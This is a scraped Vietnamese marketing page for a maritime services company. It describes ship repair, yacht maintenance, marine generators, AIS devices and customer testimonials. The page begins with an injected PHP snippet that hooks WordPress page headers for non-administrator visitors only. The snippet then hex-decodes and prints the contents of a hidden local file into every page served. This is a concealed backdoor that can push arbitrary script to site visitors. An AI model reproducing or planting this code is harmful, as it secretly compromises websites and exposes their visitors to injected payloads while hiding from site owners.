if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Dịch vụ cung ứng hàng Hải - Maritime Solutions

0768303666

Dịch vụ cung ứng hàng Hải

ĐÓNG MỚI, SỬA CHỮA PHƯƠNG TIỆN THỦY
 


Sửa chữa phương tiện thiết bị giao thông vận tải. Đóng mới, sửa chữa tàu, sà lan, ponton, gia công lắp rắp các loại kết cấu thép, nhà xưởng, xây dựng công trình giao thông thủy.

    - Đóng mới và sửa chữa phương tiện thủy, thiết bị công trình biển và các sản phẩm công nghiệp đóng tàu.
    - Thiết kế kỹ thuật và thiết kế công nghệ các loại phương tiện thủy, thiết bị công trình biển và các sản phẩm công nghiệp.
    - Thiết kế, lắp đặt và sửa chữa các loại thiết bị có yêu cầu về kỹ thuật và an toàn cao.
       - Kiểm tra không phá hủy, đo chiều dày vật liệu bằng siêu âm và các dịch vụ kỹ thuật khác có liên quan đến kiểm tra chất lượng sản phẩm.
    - Mua bán máy móc, nguyên vật liệu phục vụ sản xuất và phương tiện vận tải biển.
    - Kinh doanh khai thác cảng và các dịch vụ có liên quan.
     - Tổ chức kinh doanh dịch vụ hàng hải: dịch vụ đại lý tàu biển, dịch vụ đại lý vận tải đường biển, dịch vụ môi giới hàng hải, dịch vụ lai dắt tàu biển, dịch vụ cung ứng tàu biển, dịch vụ kiểm đếm hàng hóa, dịch vụ xếp dỡ hàng hóa.


Kinh doanh dịch vụ hàng hải và cung ứng tàu biển

Cung cấp các dịch vụ tàu dịch vụ phục vụ ngành dầu khí trên biển; tìm kiếm cứu hộ, cứu nạn trên biển; lai dắt tàu, lai dắt hỗ trợ tàu biển và các phương tiện nổi tại các vùng nước cảng biển và đường dài; vận tải hàng hóa, vận tải hóa chất, vận tải dung dịch, dung môi cho giàn khoan dầu khí. Vận tải hành khách, cho thuê tàu, thuyền có kèm thủy thủ đoàn cho vận tải ven biển và viễn dương; thực hiện các dịch vụ phòng chống ô nhiễm môi trường biển; đại lý và dịch vụ cho các tàu của Công ty. Cung ứng nhiên liệu (xăng, dầu, mỡ nhờn) cho các tàu nước ngoài đến Việt Nam. Vận tải hàng hóa đường thủy nội địa; vận tải hàng hóa đường thủy nội địa bằng phương tiện cơ giới.


Dịch vụ của Maritime Solutions

 Du thuyền

15 năm kinh nghiệm

Kinh doanh , phân phối , dịch vụ bảo trì bảo dưỡng du thuyền

Chúng tôi cung cấp cho khách hàng dịch vụ và kèm theo hỗ trợ tối đa trong những tình huống khẩn cấp. Ngoài ra, đội ngũ của  Maritime Solutions cũng sẵn sàng huấn luyện cho thủy thủ đoàn của khách hàng nhằm giúp khách hàng tự làm chủ được chiếc du thuyền của mình. Chúng tôi sẽ hướng dẫn cho khách hàng quy cách để bảo quản đối với từng dòng du thuyền , lên lịch bảo trì và nhắc nhở, hoạch định chi phí bảo trì để khách hàng có kế hoạch tài chính cũng như các trang thiết bị thay thế (nếu cần) từ chính hãng. Với các sự cố khẩn cấp, chúng tôi cung cấp dịch vụ hỗ trợ 24/24 và sẽ có mặt tại nơi du thuyền bị sự cố chậm nhất 24h kể từ khi nhận được tin báo.

Máy Cummins

15 năm kinh nghiệm

Trực tiếp nhập khẩu và cung cấp tới khách hàng các sản phẩm Doosan - Hàn Quốc, Cummins & Mitsubishi liên doanh sản xuất tại Trung Quốc.

  • Doosan - Hàn Quốc có công suất 80-1000 kVA. Động cơ được sản xuất tại nhà máy duy nhất của Doosan tại Hàn Quốc nên không có hàng nhái. 
  • Cummins Trung Quốc có công suất từ 30-1500 kVA. Là sản phẩm liên doanh của Cummins Mỹ sản xuất tại Hồ Bắc (Dongfeng Cummins) và Trùng Khánh (Chongqing Cummins).
  • Máy phát điện Mitsubishi Trung Quốc công suất 650-2500 kVA. Là dòng sản phẩm của Mitsubishi Nhật Bản liên doanh sản xuất tại Thượng Hải từ năm 2013.

 Thiết bị máy Hàng hải

15 năm kinh nghiệm

Thiết bị AIS - Giải pháp hàng hải số 1 hiện nay

Thiết bị AIS được sử dụng rất phổ biến trong ngành hàng hải. Đặc biệt là tàu cá của bà con ngư dân. Đây được xem là một trong những thiết bị cực kỳ quan trọng cho các tàu thuyền đi biển. Sản phẩm đảm bảo sự an toàn cao và hỗ trợ hoạt động vận chuyển hàng hải hiệu quả.

Sửa chữa tàu biển

15 năm kinh nghiệm

Công tác sửa chữa có thể phân thành 4 hình thức sau:

  • Bảo dưỡng: là hình thức sửa chữa thấp nhất, được tiến hành một phần trong lúc vận hành, một phần ở cảng.
  • Tiểu tu (sửa chữa nhỏ): công tác này được tiến hành theo định kỳ hàng năm.
  • Trung tu (sửa chữa vừa): là hình thức sửa chữa vừa, được tiến hành từ 2 – 3 lần giữa 2 kỳ đại tu.
  • Đại tu (sửa chữa lớn): nhiệm vụ của công tác này là sửa chữa thân tàu, thiết bị và máy móc một cách triệt để, nhằm khôi phục lại trạng thái kỹ thuật ban đầu.

Dịch vụ cung ứng thiết bị hàng hải

15 năm kinh nghiệm


NHÀ PHÂN PHỐI CHÍNH THỨC & BẢO HÀNH SỬA CHỮA

Chúng tôi là đối tác của các nhãn hàng hàng đầu thế giới về thiết bị điện tử hàng hải: Icom, Sonic Kaijo, JMC, McMURDO, Koshin, Kenko,Daiko, Kelvin Hughes, Tohatsu, Unikas, Suzuki.

Chúng tôi không chỉ bán sản phẩm mà còn chuyển giao công nghệ từ các đối tác chuyên nghiệp về thiết bị hàng hải.Chúng tôi sẵn sàng giới thiệu những giải pháp kỹ thuật và kinh tế đem lại hiệu quả tối ưu cho các bạn trong công việc. 

 chứng thực

Kiểm tra những gì khách hàng của chúng tôi nói về chúng tôi

Công ty cổ phần giải pháp kỹ thuật hàng hải Việt Nam  cấp dịch vụ bảo dưỡng tàu biển đáng tin cậy. Chúng tôi đã trải nghiệm hầu hết các dịch , tất cả đều chỉnh chu, phù hợp, vượt qua những mong đợi của chúng tôi. Chúc công ty không ngừng phát triển mang đến ngày càng nhiều dịch vụ mới, hấp dẫn cho khách hàng .

Anh Long 

hãng tàu cá Phước Huy

Công ty cổ phần giải pháp kỹ thuật hàng hải Việt Nam với đội ngũ kỹ sư, kỹ thuật viên đông đảo, nhiều kinh nghiệm, làm việc chuyên nghiệp, cùng với các thiết bị đo kiểm chuyên dụng và nhiều linh kiện vật tư thay thế, chuyên gia tư vấn của họ cũng dễ dàng để làm việc với các dự án  chữa du thuyền đúng thời hạn .

 Anh Tuấn

Du thuyền Việt nam 

Rất hiểu ý khách hàng và  tình chu đáo. Là một khách hàng đã sử dụng  vụ bảo dưỡng tàu của Công ty cổ phần giải pháp kỹ thuật hàng hải Việt Nam . Tôi xin chúc Cty thành công hơn nữa, với nhiều những dự án lớn hơn nữa, hãy luôn giữ vững tiêu chí lấy khách hàng làm trung tâm để ngày càng phát triển.

 Chị Bích Phương

Vietyacht - Jeanneau  

Liên hệ với chúng tôi để được tư vấn Dịch vụ và giá cả tốt nhất 

>